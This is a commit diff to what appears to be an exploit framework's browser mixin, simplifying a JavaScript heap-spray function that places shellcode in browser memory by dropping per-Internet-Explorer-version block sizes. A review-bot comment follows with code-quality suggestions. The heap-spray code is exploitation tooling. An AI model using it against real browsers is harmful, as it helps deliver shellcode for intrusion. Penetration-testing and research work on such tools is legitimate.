One size rules them all.
parent
722e077029
commit
8cb5da0794
|
@ -799,8 +799,6 @@ protected
|
||||||
#
|
#
|
||||||
# The "sprayHeap" JavaScript function supports the following arguments:
|
# The "sprayHeap" JavaScript function supports the following arguments:
|
||||||
# shellcode => The shellcode to spray in JavaScript.
|
# shellcode => The shellcode to spray in JavaScript.
|
||||||
# browser => The type of browser to target for precise block size, such as:
|
|
||||||
# 'ie8', 'ie9', 'ie10', and 'generic'.
|
|
||||||
# objId => Optional. The ID for a <div> HTML tag.
|
# objId => Optional. The ID for a <div> HTML tag.
|
||||||
# offset => Optional. Number of bytes to align the shellcode, default: 0x104
|
# offset => Optional. Number of bytes to align the shellcode, default: 0x104
|
||||||
# heapBlockSize => Optional. Allocation size, default: 0x80000
|
# heapBlockSize => Optional. Allocation size, default: 0x80000
|
||||||
|
@ -822,7 +820,6 @@ protected
|
||||||
function sprayHeap( oArg ) {
|
function sprayHeap( oArg ) {
|
||||||
|
|
||||||
shellcode = oArg.shellcode;
|
shellcode = oArg.shellcode;
|
||||||
browser = oArg.browser;
|
|
||||||
offset = oArg.offset;
|
offset = oArg.offset;
|
||||||
heapBlockSize = oArg.heapBlockSize;
|
heapBlockSize = oArg.heapBlockSize;
|
||||||
maxAllocs = oArg.maxAllocs;
|
maxAllocs = oArg.maxAllocs;
|
||||||
|
@ -832,7 +829,6 @@ protected
|
||||||
if (offset == undefined) { offset = 0x104; }
|
if (offset == undefined) { offset = 0x104; }
|
||||||
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
|
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
|
||||||
if (maxAllocs == undefined) { maxAllocs = 0x350; }
|
if (maxAllocs == undefined) { maxAllocs = 0x350; }
|
||||||
if (browser == undefined) { browser = 'generic'; }
|
|
||||||
|
|
||||||
if (offset > 0x800) { throw "Bad alignment"; }
|
if (offset > 0x800) { throw "Bad alignment"; }
|
||||||
|
|
||||||
|
@ -855,31 +851,8 @@ protected
|
||||||
for (var i = 0; i < maxAllocs; i++)
|
for (var i = 0; i < maxAllocs; i++)
|
||||||
{
|
{
|
||||||
var obj = document.createElement("button");
|
var obj = document.createElement("button");
|
||||||
switch (browser)
|
|
||||||
{
|
|
||||||
case 'ie8':
|
|
||||||
obj.title = data.substring(0, (heapBlockSize-6)/2);
|
|
||||||
div_container.appendChild(obj);
|
|
||||||
break;
|
|
||||||
|
|
||||||
case 'ie9':
|
|
||||||
obj.title = data.substring(0, (heapBlockSize-2)/2);
|
obj.title = data.substring(0, (heapBlockSize-2)/2);
|
||||||
div_container.appendChild(obj);
|
div_container.appendChild(obj);
|
||||||
break;
|
|
||||||
|
|
||||||
case 'ie10':
|
|
||||||
obj.title = data.substring(0, (heapBlockSize-2)/2);
|
|
||||||
div_container.appendChild(obj);
|
|
||||||
break;
|
|
||||||
|
|
||||||
case 'generic':
|
|
||||||
obj.title = data.substring(0, (heapBlockSize-2)/2);
|
|
||||||
div_container.appendChild(obj);
|
|
||||||
break;
|
|
||||||
|
|
||||||
default:
|
|
||||||
throw "Invalid argument";
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
|
||||||
|
|
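Review bot: The assignments at the top of the embedded `sprayHeap` function (`shellcode = oArg.shellcode;`, `offset = oArg.offset;`, `heapBlockSize = oArg.heapBlockSize;`, `maxAllocs = oArg.maxAllocs;`) carry no `var`, so unless they are declared in lines outside these hunks they create or overwrite page-level globals. Declaring them locally, e.g. `var offset = oArg.offset;`, keeps the helper from clobbering names used by the surrounding page script. With the `switch` gone, a caller that still passes `browser` is silently ignored, where an unrecognised value used to throw "Invalid argument"; the header comment could record this with `# browser => No longer used; ignored if passed.`. The visible comment lines also do not list `maxAllocs`, although the function reads it and defaults it to 0x350. The function body starts and continues outside the hunks shown.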